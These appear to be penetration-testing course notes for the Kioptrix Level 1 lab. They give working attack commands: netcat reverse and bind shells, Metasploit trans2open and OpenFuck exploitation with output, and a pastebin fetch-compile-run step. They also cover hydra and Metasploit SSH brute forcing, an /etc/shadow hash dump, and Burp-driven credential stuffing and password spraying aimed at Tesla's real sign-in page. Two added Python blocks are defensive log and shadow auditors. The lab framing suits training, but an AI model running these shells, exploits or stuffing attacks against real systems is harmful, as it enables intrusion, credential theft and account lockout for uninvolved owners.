Exploitation Basics

Reverse Shells vs Bind Shells

netcat

  • reverse shell: the victim connects back to us while we are listening; on connection it hands us a Linux shell (e.g. /bin/bash). This is what we use in about 95% of cases.
  • bind shell: the victim listens on a port and we connect to it. Useful to bypass firewalls.

Reverse shell:

  1. on our machine, open a listening port: nc -nvlp 4444
  2. on the victim, connect back and hand out a shell: nc 192.168.92.128 4444 -e /bin/bash

Bind shell:

  1. on the victim, listen and hand out a shell: nc -nvlp 4444 -e /bin/bash
  2. connect to our victim: nc 192.168.92.128 4444

Note: 4444 is often blacklisted by antiviruses and firewalls.

Staged vs Non-Staged Payloads

  • non-staged payload: sends the whole exploit shellcode at once (larger, so it won't always work); Metasploit names it with an underscore, e.g. windows/meterpreter_reverse_tcp
  • staged payload: sends the payload in stages (can be less stable); Metasploit names it with an extra /, e.g. windows/meterpreter/reverse_tcp

If one type is not working, try the other one.

Gaining Root with Metasploit

  1. run msfconsole
  2. search trans2open and look for the module matching the targeted OS
  3. use 1 (the index of the matching result), then options to see which options must be provided
  4. set rhosts 192.168.92.129, then options again to confirm it is set; show targets lists the supported targets
  5. type run or exploit; if it fails, the payload is usually the issue, so check options again
  6. set payload linux/x86/shell_reverse_tcp (use tab completion to list the available payloads); this is now a non-staged payload. options again to confirm it is set.

We're in:

whoami
root
hostname
kioptrix.level1

Manual Exploitation

With OpenFuck:

  1. git clone https://github.com/heltonWernik/OpenFuck.git && cd OpenFuck
  2. apt install libssl-dev
  3. gcc -o open OpenFuck.c -lcrypto
  4. ./open with no arguments to list the options you have to pass
  5. ./open 0x6b 192.168.92.129 -c 40: 0x6b is the target type, which we know from our enumeration work; no port needed because we don't use ssl.

whoami
root
hostname
kioptrix.level1

Metasploit is more robust. The OSCP certification exam doesn't allow Metasploit, so the manual route still matters. Pen testers look for practicality.

  • sudo -l to know our privileges.
  • cat /etc/passwd to list the accounts (the password field only holds x placeholders; from uid 500 onward we find the real user accounts: john and harold).
  • cat /etc/shadow to get the actual password hashes.

Post-exploitation: a new round of enumeration starts.

Brute Force Attacks

SSH

Three reasons to do this in an assessment:

  1. test password strength
  2. test whether we can get in with a weak or default password
  3. test whether the blue team catches us when brute forcing (being deliberately loud sometimes to test the other team)

hydra

  • hydra -l root -P /usr/share/wordlists/metasploit/unix_passwords.txt ssh://192.168.92.129:22 -t 4 -V (-l single username, -P password list, -t number of parallel threads, -V verbose: print every attempt).

metasploit

  • run msfconsole, then search ssh
  • use auxiliary/scanner/ssh/ssh_login, then options
  • set username root, set PASS_FILE /usr/share/wordlists/metasploit/unix_passwords.txt, set rhosts 192.168.92.129, set threads 10 (would be detected super fast) and set verbose true.
  • run or exploit

Credential Stuffing and Password Spraying

Entering stolen (leaked) credentials into a login form.

Credential Stuffing

  • create text files with your users and your passwords.
  • install FoxyProxy Standard in Firefox (easier than the previous method); add a proxy called Burp Suite with 127.0.0.1 as host and 8080 as port, save, then activate the added proxy.
  • go to the Tesla sign-in page, launch Burp Suite, send the login POST request to Intruder, click Add § on the selected email value and again on the selected password value, then select the Pitchfork attack type. Under Payloads, paste your list of users (payload set 1) and your list of passwords (simple list, payload set 2).
  • run and monitor the status column (301 means redirect); a change in response size is also interesting sometimes.
  • under Settings, use the grep match feature: paste the expected failed-login response ("We could not sign you in" in our example); it adds a checkbox column to the results (we see it's not working).

Password Spraying

  • click Clear § and then click Add § on the selected email value only. Now we test all the emails against one breached password: select the Sniper attack type; the payload is your list of possible emails.

Beware when attacking active accounts: you can lock them out. On a pen test, know the client's password-attempt (lockout) rules in advance so you don't block any of their accounts.

These two techniques are the most common way in during an assessment. Default credentials work well too. Often the "house" is well protected from the outside, but it's not the same once you're inside: we tend to leave our inside doors open.
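The brute-force runs above (hydra and ssh_login against root) and the spraying run (one password across many accounts) leave very different footprints in sshd logs, which is what a blue team would key on. This added example, not part of the course notes, parses constructed "Failed password" lines (the standard syslog/sshd format; the timestamps, PIDs and the 10.0.0.7 and 192.168.92.50 source addresses are invented) and labels each source as brute force, spray or benign from the size and spread of its busiest failure window.

```python
import re
from collections import defaultdict
from datetime import datetime

LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: Failed password for "
    r"(?:invalid user )?(?P<user>\S+) from (?P<ip>\S+) port \d+ ssh2$")


def _fail(ts, user, ip, pid, invalid=False):
    # Build one constructed sshd failure line in syslog format (no year).
    who = f"invalid user {user}" if invalid else user
    return f"Jul 16 {ts} kioptrix sshd[{pid}]: Failed password for {who} from {ip} port {40000 + pid} ssh2"


# Constructed sample (not from the page): a hydra-style burst against root from
# one source, one guess per account (spraying) from another, and one user typo.
SAMPLE_LOG = (
    [_fail(f"10:01:{12 + i:02d}", "root", "192.168.92.128", 2200 + i) for i in range(12)]
    + [_fail(f"10:05:{10 * i:02d}", u, "10.0.0.7", 2300 + i, u not in ("root", "john", "harold"))
       for i, u in enumerate(["root", "john", "harold", "admin", "test", "oracle"])]
    + [_fail("10:30:01", "john", "192.168.92.50", 2400),
       "Jul 16 10:30:09 kioptrix sshd[2401]: Accepted password for john from 192.168.92.50 port 42000 ssh2"]
)


def parse_failures(lines, year=2024):
    # Yield (epoch_seconds, user, ip) for every failed-password line.
    for line in lines:
        m = LINE_RE.match(line)
        if m:
            ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
            yield ts.timestamp(), m["user"], m["ip"]


def classify_sources(lines, window=60, min_failures=5, min_users=4):
    # Per source IP: size of the busiest failure window (sliding, in seconds)
    # and a label. Many failures against few accounts -> brute force;
    # the same burst spread across many accounts -> password spraying.
    by_ip = defaultdict(list)
    for t, user, ip in parse_failures(lines):
        by_ip[ip].append((t, user))
    verdicts = {}
    for ip, events in by_ip.items():
        events.sort()
        peak = start = 0
        for end in range(len(events)):
            while events[end][0] - events[start][0] > window:
                start += 1
            peak = max(peak, end - start + 1)
        users = sorted({u for _, u in events})
        kind = ("benign" if peak < min_failures
                else "password_spray" if len(users) >= min_users else "brute_force")
        verdicts[ip] = {"kind": kind, "peak_failures": peak, "users": users}
    return verdicts
```

The thresholds are deliberately low to match the small sample; on a real host, tune window and min_failures against the lockout policy you agreed on with the client.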

Our Notes, Revisited

SMB - trans2open

msf6 exploit(linux/samba/trans2open) > exploit

[*] Started reverse TCP handler on 192.168.92.128:4444
[*] 192.168.92.129:139 - Trying return address 0xbffffdfc...
[*] 192.168.92.129:139 - Trying return address 0xbffffcfc...
[*] 192.168.92.129:139 - Trying return address 0xbffffbfc...
[*] 192.168.92.129:139 - Trying return address 0xbffffafc...
[*] 192.168.92.129:139 - Trying return address 0xbffff9fc...
[*] 192.168.92.129:139 - Trying return address 0xbffff8fc...
[*] 192.168.92.129:139 - Trying return address 0xbffff7fc...
[*] 192.168.92.129:139 - Trying return address 0xbffff6fc...
[*] Command shell session 1 opened (192.168.92.128:4444 -> 192.168.92.129:32778) at 2024-07-16 10:01:44 -0400

[*] Command shell session 2 opened (192.168.92.128:4444 -> 192.168.92.129:32779) at 2024-07-16 10:01:45 -0400
[*] Command shell session 3 opened (192.168.92.128:4444 -> 192.168.92.129:32780) at 2024-07-16 10:01:46 -0400
[*] Command shell session 4 opened (192.168.92.128:4444 -> 192.168.92.129:32781) at 2024-07-16 10:01:47 -0400
whoami
root
hostname
kioptrix.level1

80 - modssl

./open 0x6b 192.168.92.129 -c 40

*******************************************************************
* OpenFuck v3.0.32-root priv8 by SPABAM based on openssl-too-open *
*******************************************************************
* by SPABAM    with code of Spabam - LSD-pl - SolarEclipse - CORE *
* #hackarena  irc.brasnet.org                                     *
* TNX Xanthic USG #SilverLords #BloodBR #isotk #highsecure #uname *
* #ION #delirium #nitr0x #coder #root #endiabrad0s #NHC #TechTeam *
* #pinchadoresweb HiTechHate DigitalWrapperz P()W GAT ButtP!rateZ *
*******************************************************************

Connection... 40 of 40
Establishing SSL connection
cipher: 0x4043808c   ciphers: 0x80f8068
Ready to send shellcode
Spawning shell...
bash: no job control in this shell
bash-2.05$
race-kmod.c; gcc -o p ptrace-kmod.c; rm ptrace-kmod.c; ./p; m/raw/C7v25Xr9 -O pt
--15:33:39--  https://pastebin.com/raw/C7v25Xr9
           => `ptrace-kmod.c'
Connecting to pastebin.com:443... connected!
HTTP request sent, awaiting response... 200 OK
Length: unspecified [text/plain]

    0K ...                                                    @   3.84 MB/s

15:33:39 (1.28 MB/s) - `ptrace-kmod.c' saved [4026]

ptrace-kmod.c:183:1: warning: no newline at end of file
/usr/bin/ld: cannot open output file p: Permission denied
collect2: ld returned 1 exit status
whoami
root
hostname
kioptrix.level1

Post Exploitation

cat /etc/shadow
root:$1$XROmcfDX$tF93GqnLHOJeGRHpaNyIs0:14513:0:99999:7:::
bin:*:14513:0:99999:7:::
daemon:*:14513:0:99999:7:::
adm:*:14513:0:99999:7:::
lp:*:14513:0:99999:7:::
sync:*:14513:0:99999:7:::
shutdown:*:14513:0:99999:7:::
halt:*:14513:0:99999:7:::
mail:*:14513:0:99999:7:::
news:*:14513:0:99999:7:::
uucp:*:14513:0:99999:7:::
operator:*:14513:0:99999:7:::
games:*:14513:0:99999:7:::
gopher:*:14513:0:99999:7:::
ftp:*:14513:0:99999:7:::
nobody:*:14513:0:99999:7:::
mailnull:!!:14513:0:99999:7:::
rpm:!!:14513:0:99999:7:::
xfs:!!:14513:0:99999:7:::
rpc:!!:14513:0:99999:7:::
rpcuser:!!:14513:0:99999:7:::
nfsnobody:!!:14513:0:99999:7:::
nscd:!!:14513:0:99999:7:::
ident:!!:14513:0:99999:7:::
radvd:!!:14513:0:99999:7:::
postgres:!!:14513:0:99999:7:::
apache:!!:14513:0:99999:7:::
squid:!!:14513:0:99999:7:::
pcap:!!:14513:0:99999:7:::
john:$1$zL4.MR4t$26N4YpTGceBO0gTX6TAky1:14513:0:99999:7:::
harold:$1$Xx6dZdOd$IMOGACl3r757dv17LZ9010:14513:0:99999:7:::
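Looking at that dump with a hardening eye: every live account uses $1$ (md5-crypt), the max-age field is 99999 (never expires) and the last-change day 14513 is years old, while the * and !! entries are locked and need no attention. This added example, not part of the course notes, parses shadow(5) lines and reports those issues; it takes the root, bin, mailnull and john lines from the dump above plus one constructed sha512-crypt entry (svc-backup, not from the page) for contrast.

```python
import datetime

# Entries copied from the page's /etc/shadow dump, plus one constructed
# sha512-crypt entry (svc-backup, placeholder hash, not from the page).
SHADOW_SAMPLE = """\
root:$1$XROmcfDX$tF93GqnLHOJeGRHpaNyIs0:14513:0:99999:7:::
bin:*:14513:0:99999:7:::
mailnull:!!:14513:0:99999:7:::
john:$1$zL4.MR4t$26N4YpTGceBO0gTX6TAky1:14513:0:99999:7:::
svc-backup:$6$c0nstructed$NotARealHashJustAPlaceholderValue0:19900:0:90:7:::
"""

# crypt(3) hash identifiers; anything without a $ prefix is legacy DES crypt.
HASH_IDS = {"$1$": "md5crypt", "$2a$": "bcrypt", "$2b$": "bcrypt", "$2y$": "bcrypt",
            "$5$": "sha256crypt", "$6$": "sha512crypt", "$7$": "scrypt", "$y$": "yescrypt"}
WEAK_ALGOS = {"md5crypt", "descrypt"}


def parse_shadow(text):
    # Map user -> (hash, lastchange_days, max_age_days) for well-formed lines.
    entries = {}
    for line in text.splitlines():
        f = line.split(":")
        if len(f) != 9:
            continue  # shadow(5) has exactly nine colon-separated fields
        entries[f[0]] = (f[1], int(f[2] or 0), int(f[4] or 99999))
    return entries


def hash_algo(h):
    return next((name for pfx, name in HASH_IDS.items() if h.startswith(pfx)),
                "unknown" if h.startswith("$") else "descrypt")


def audit_shadow(text, today_days=None, max_unchanged_days=365):
    # Return (user, issue) pairs worth fixing; locked accounts are skipped.
    if today_days is None:
        today_days = (datetime.date.today() - datetime.date(1970, 1, 1)).days
    findings = []
    for user, (h, last, max_age) in parse_shadow(text).items():
        if h.startswith(("*", "!")):
            continue  # locked or no-login account: nothing a cracker can use
        if h == "":
            findings.append((user, "empty password"))
            continue
        if hash_algo(h) in WEAK_ALGOS:
            findings.append((user, f"weak hash {hash_algo(h)}"))
        if max_age >= 99999:
            findings.append((user, "password never expires"))
        if today_days - last > max_unchanged_days:
            findings.append((user, f"unchanged for {today_days - last} days"))
    return findings
```

Passing today_days=19920 (2024-07-16, the date of the session above) reproduces the lab's situation: root and john each get three findings, the locked accounts and the sha512-crypt account get none.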

Findings

Undetected malicious activity: brute forcing with 4 and with 100 threads (up to 500 root credentials tested) was never blocked.